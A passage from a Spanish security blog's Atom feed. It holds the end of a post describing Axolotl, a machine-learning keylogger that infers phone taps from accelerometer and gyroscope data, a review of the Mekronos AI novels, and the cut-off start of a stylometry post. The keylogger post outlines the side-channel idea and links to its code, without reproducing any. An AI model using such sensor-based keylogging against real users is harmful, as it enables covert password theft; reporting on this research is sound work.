  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;19&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Subtle Emphasis&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;21&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Intense Emphasis&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;31&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Subtle Reference&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;32&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Intense Reference&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;33&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Book Title&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;37&quot; Name=&quot;Bibliography&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; QFormat=&quot;true&quot; Name=&quot;TOC Heading&quot;/&gt;
 &lt;/w:LatentStyles&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Tabla normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-priority:99;
 mso-style-qformat:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin-top:0cm;
 mso-para-margin-right:0cm;
 mso-para-margin-bottom:10.0pt;
 mso-para-margin-left:0cm;
 line-height:115%;
 mso-pagination:widow-orphan;
 font-size:11.0pt;
 font-family:&quot;Calibri&quot;,&quot;sans-serif&quot;;
 mso-ascii-font-family:Calibri;
 mso-ascii-theme-font:minor-latin;
 mso-fareast-font-family:&quot;Times New Roman&quot;;
 mso-fareast-theme-font:minor-fareast;
 mso-hansi-font-family:Calibri;
 mso-hansi-theme-font:minor-latin;
 mso-bidi-font-family:&quot;Times New Roman&quot;;
 mso-bidi-theme-font:minor-bidi;}
&lt;/style&gt;
&lt;![endif]--&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;

&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;El &lt;b&gt;Machine Learning&lt;/b&gt; se podría decir que se encuentra entre
un subcampo de las ciencias de la computación y una rama de la inteligencia
artificial. El objetivo de esta ciencia es desarrollar técnicas que permitan a
los ordenadores aprender.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;225&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAE4XXOaqIGj8D9L76LllfQ9_JMtyiJSpLn1tFU85U606vg-9imB-JDQeKLjEkLHFoRCowcttiso8OjGEaeQxvwg2sAh12KBm31XrkL6x8-p7behCOBgVPrAjuvFL2UbC0D4LVmaRTu5o/s400/machine-learning.jpg&quot; width=&quot;400&quot; /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;

&lt;/span&gt;&lt;/span&gt;&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Es cierto que el Machine Learning está más de moda que
nunca, es cada vez más frecuente el uso de estas técnicas por grande
corporaciones y esto es sólo el comienzo, ¿acabaran las máquinas sustituyéndonos
a los profesionales del sector? No obstante el Machine Learning no es nuevo, ya
hace años hubo proyectos de Machine Learning vinculados con la seguridad
informática. Por ejemplo, utilizar el &lt;a href=&quot;http://ieeexplore.ieee.org/document/1301311/?reload=true&quot; target=&quot;_blank&quot;&gt;Machine Learning&lt;/a&gt; en datos de &lt;a href=&quot;https://people.eecs.berkeley.edu/~tygar/papers/Keyboard_Acoustic_Emanations_Revisited/TISSEC.pdf&quot; target=&quot;_blank&quot;&gt;audio deteclados de PCs&lt;/a&gt;, móviles o cajeros automáticos para extraer contraseñas o lo
que es lo mismo &lt;a href=&quot;https://en.m.wikipedia.org/wiki/Side-channel_attack&quot; target=&quot;_blank&quot;&gt;Side-channel attack&lt;/a&gt;. La estrategia se basa en diferenciar el
sonido emanado por las diferentes teclas, es decir cada tecla suena diferente a
la otra, es diferenciadora.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;

&lt;/span&gt;&lt;/span&gt;&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;El proyecto &lt;b&gt;Axolotl&lt;/b&gt; se describe en &lt;b&gt;un ataque donde las lecturas
del acelerómetro/giroscopio y el machine learning &lt;/b&gt;se utilizan para desarrollar
un &lt;a href=&quot;https://estacioninformatica.blogspot.com.es/2013/04/keyscan-metasploit.html&quot; target=&quot;_blank&quot;&gt;keylogger&lt;/a&gt; para dispositivos móviles. Los creadores &lt;b&gt;han desarrollado un ataque
que explota el acelerómetro&lt;/b&gt; (que se encarga de las medidas del movimiento) &lt;b&gt;y el
giroscopio&lt;/b&gt; (que se encarga de medir la rotación), &lt;b&gt;ambos no requieren permisos&lt;/b&gt; y
&lt;b&gt;pueden ser leídos &lt;/b&gt;por aplicaciones en segundo plano.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;

&lt;/span&gt;&lt;/span&gt;&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;El estudio se basa en 4 hipótesis: &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;

&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ol&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Cuando toque en su teléfono, que se mueve, (obvio).&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Este movimiento puede ser recogido por el giroscopio y
el acelerómetro.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Este movimiento es distinta de otros movimientos y puede
ser identificado por machine learning y técnicas estadísticas.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;El movimiento es lo suficientemente exclusivo para
identificar dónde ocurrió en pantalla.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;

&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Los creadores han publicado en Github todo el código, para
más información sobre el proyecto visitad su el siguiente enlace: &lt;a href=&quot;https://github.com/tomasreimers/axolotl&quot;&gt;https://github.com/tomasreimers/axolotl&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://estacioninformatica.blogspot.com/feeds/6077341289624290960/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='https://estacioninformatica.blogspot.com/2017/09/axolotl-un-keylogger-para-iphone-y.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2635749723269966578/posts/default/6077341289624290960'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2635749723269966578/posts/default/6077341289624290960'/><link rel='alternate' type='text/html' href='https://estacioninformatica.blogspot.com/2017/09/axolotl-un-keylogger-para-iphone-y.html' title='Axolotl un Keylogger para iPhone y Android'/><author><name>n0ipr0cs</name><uri>http://www.blogger.com/profile/04491865020723502347</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAE4XXOaqIGj8D9L76LllfQ9_JMtyiJSpLn1tFU85U606vg-9imB-JDQeKLjEkLHFoRCowcttiso8OjGEaeQxvwg2sAh12KBm31XrkL6x8-p7behCOBgVPrAjuvFL2UbC0D4LVmaRTu5o/s72-c/machine-learning.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2635749723269966578.post-192408378263425643</id><published>2017-09-03T00:50:00.000+02:00</published><updated>2017-09-03T00:50:58.324+02:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Aicran"/><category scheme="http://www.blogger.com/atom/ns#" term="Edén"/><category scheme="http://www.blogger.com/atom/ns#" term="Fare9"/><category scheme="http://www.blogger.com/atom/ns#" term="Gema López"/><category scheme="http://www.blogger.com/atom/ns#" term="Gema López Sánchez"/><category scheme="http://www.blogger.com/atom/ns#" term="IA"/><category scheme="http://www.blogger.com/atom/ns#" term="Inteligencia Artificial"/><category scheme="http://www.blogger.com/atom/ns#" term="Mekronos"/><category scheme="http://www.blogger.com/atom/ns#" term="Mekronos Metamorfosis"/><category scheme="http://www.blogger.com/atom/ns#" term="Rea"/><title type='text'>Mekronos, una historia sobre IAs</title><content type='html'>Buenas amigos, voy a abrir la temporada de posts de estación informática, con uno algo diferente, hoy voy a hablar de una pequeña bilogía la cual me resultó interesante.&lt;br /&gt;
El nombre de esta bilogía es Mekronos (y en el segundo libro Mekronos: Metamorfosis), en un principio me llamó la atención su portada:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin-SmEe4sy3itMjVSDh_mK6OGcBWlNz9tgTLBbZdr80kxZfUPCbx2Pva0tCThK41msjXYizBsCLWVjEHrXKLPW5jUaJ_iW9wn_9tWWiXPCG-xjAJOoBH96b6nFad91_AfOwJekFIaL7kg/s1600/516Is2zmBXL._SY346_.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;346&quot; data-original-width=&quot;242&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin-SmEe4sy3itMjVSDh_mK6OGcBWlNz9tgTLBbZdr80kxZfUPCbx2Pva0tCThK41msjXYizBsCLWVjEHrXKLPW5jUaJ_iW9wn_9tWWiXPCG-xjAJOoBH96b6nFad91_AfOwJekFIaL7kg/s320/516Is2zmBXL._SY346_.jpg&quot; width=&quot;223&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Pues el color rojo, y la imagen de un dragón de fondo, me recordaba a mi ya algo anticuado Backtrack 5 R3 (Sistema operativo con el que empecé en el mundo del hacking):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijuD5wp6zdQ8P4Wz8y1J6ujdWITlULH6wE2HmdYJwEwKtZusBNP4JEowdmnXS2F2-KoNN1Y_A_8pp3VfgmmyNnmj_6Hrz6-f1IkMt-vdfntuHKqMa_avqg5AzHnzQnuwvwbqc4gZ2FUmo/s1600/maxresdefault.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;180&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijuD5wp6zdQ8P4Wz8y1J6ujdWITlULH6wE2HmdYJwEwKtZusBNP4JEowdmnXS2F2-KoNN1Y_A_8pp3VfgmmyNnmj_6Hrz6-f1IkMt-vdfntuHKqMa_avqg5AzHnzQnuwvwbqc4gZ2FUmo/s320/maxresdefault.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Este libro cuenta la historia de un mundo digital más allá de lo que se conoce como Internet, o inclusive la Deep Web. Este mundo es conocido como &lt;i&gt;Aicran&lt;/i&gt;, este mundo digital está dividido en varias barreras, cada una con un distinto propósito muy relacionados con distintas funciones actuales de la actual internet. Una de las barreras es Edén, la cual sería un buscador de información completo, toda la información existente en equipos electrónicos estaría aquí condensada,&amp;nbsp; y otra de las barreras (de cuatro existentes) es Rea, Rea vendría a ser como un maps chetado, incluyendo dentro de la imagen de este mundo, todos los dispositivos conectados a internet.&lt;br /&gt;
Este mundo es el lugar de residencia de las inteligencias artificiales (IAs). Algunas personas son capaces de entrar en &lt;i&gt;Aicran&lt;/i&gt; a través de distintos &lt;i&gt;linker corpse&lt;/i&gt; que les conectan a una IA en concreto, estas personas son llamadas receptores.&lt;br /&gt;
La historia se centra en una estudiante de periodismo llamada &lt;i&gt;Esmeralda Creus&lt;/i&gt;, la cual tras una fatídica noche, despierta con un tatuaje algo extraño, este tatuaje se conoce que es una IA biológica, la cual no sólo es capaz de existir en &lt;i&gt;Aicran&lt;/i&gt; si no también en el mundo real, esta IA es llamada &lt;i&gt;Mekronos&lt;/i&gt; y en lugar de tener un &lt;i&gt;linker corpse&lt;/i&gt; para conectar con un receptor, él es su propio &lt;i&gt;linker corpse&lt;/i&gt; y tiene que vivir como un simbionte pegado a su receptor.&lt;br /&gt;
&lt;i&gt;Esmeralda&lt;/i&gt; se verá implicada en problemas con una organización terrorista conocida como &lt;i&gt;Nargos&lt;/i&gt; los cuales odian todo tipo de tecnología, y han introducido en España una nueva droga, la cual es capaz de sedar y someter completamente a todas las personas que la toman.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXAXpJxNdNKQs-LosrSanEvN6pVDtYBspNZ2-KDvPG5mC7NHHOF3mRAOJumY6DfnWUHAUHH5x1NRwhtn74r2klGozXBS94b1p-fTufsCVrMkhlMILte6X-1CJ6jFu0ghzkrKH_sD_W8FI/s1600/51mIjg0A8JL._SY346_.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;346&quot; data-original-width=&quot;242&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXAXpJxNdNKQs-LosrSanEvN6pVDtYBspNZ2-KDvPG5mC7NHHOF3mRAOJumY6DfnWUHAUHH5x1NRwhtn74r2klGozXBS94b1p-fTufsCVrMkhlMILte6X-1CJ6jFu0ghzkrKH_sD_W8FI/s320/51mIjg0A8JL._SY346_.jpg&quot; width=&quot;223&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Es una historia que la verdad, a pesar de no tocar más que libros técnicos, personalmente me consiguió enganchar hasta finalizar los dos libros, para conocer más de la historia, sólo tenéis que ir a Amazón:&lt;br /&gt;
&lt;a href=&quot;https://www.amazon.es/Mekronos-Gema-L%C3%B3pez-S%C3%A1nchez-ebook/dp/B01J60JAOQ&quot; target=&quot;_blank&quot;&gt;Mekronos&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;https://www.amazon.es/Mekronos-Metamorfosis-Gema-L%C3%B3pez-S%C3%A1nchez-ebook/dp/B072XKCSKL/ref=pd_sim_351_1/258-7190883-5272331?_encoding=UTF8&amp;amp;psc=1&amp;amp;refRID=2M4TZMYZZB6D23AYXMS7&quot; target=&quot;_blank&quot;&gt;Mekronos Metamorfosis&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Su autora Gema López, a pesar de su edad, tiene ya varios libros publicados y apunta a una larga y gran carrera dentro del mundo de la escritura. Podéis conocer más sobre ella en su blog: &lt;a href=&quot;https://lacontraportadablog.blogspot.com.es/&quot; target=&quot;_blank&quot;&gt;La Contraportada&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Hasta aquí el post para comenzar septiembre, pero tened por seguro, que esta temporada traerá muchas novedades y sorpresas.&lt;br /&gt;
&lt;a href=&quot;https://twitter.com/erockandblues?lang=es&quot; target=&quot;_blank&quot;&gt;Fare9&lt;/a&gt;</content><link rel='replies' type='application/atom+xml' href='https://estacioninformatica.blogspot.com/feeds/192408378263425643/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='https://estacioninformatica.blogspot.com/2017/09/mekronos-una-historia-sobre-ias.html#comment-form' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2635749723269966578/posts/default/192408378263425643'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2635749723269966578/posts/default/192408378263425643'/><link rel='alternate' type='text/html' href='https://estacioninformatica.blogspot.com/2017/09/mekronos-una-historia-sobre-ias.html' title='Mekronos, una historia sobre IAs'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin-SmEe4sy3itMjVSDh_mK6OGcBWlNz9tgTLBbZdr80kxZfUPCbx2Pva0tCThK41msjXYizBsCLWVjEHrXKLPW5jUaJ_iW9wn_9tWWiXPCG-xjAJOoBH96b6nFad91_AfOwJekFIaL7kg/s72-c/516Is2zmBXL._SY346_.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2635749723269966578.post-3767354837816604063</id><published>2017-08-30T23:59:00.000+02:00</published><updated>2017-08-30T23:59:26.370+02:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Anonimato"/><category scheme="http://www.blogger.com/atom/ns#" term="bitcoin"/><category scheme="http://www.blogger.com/atom/ns#" term="Criptografía"/><category scheme="http://www.blogger.com/atom/ns#" term="Privacidad"/><category scheme="http://www.blogger.com/atom/ns#" term="Satoshi Nakamoto"/><title type='text'>Stylometry o como identifican Satoshi Nakamoto</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;Hola tod@s&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;Satoshi Nakamoto el supuesto creador de Bitcoin, &amp;nbsp;se ha convertido sin duda en el multimillonario
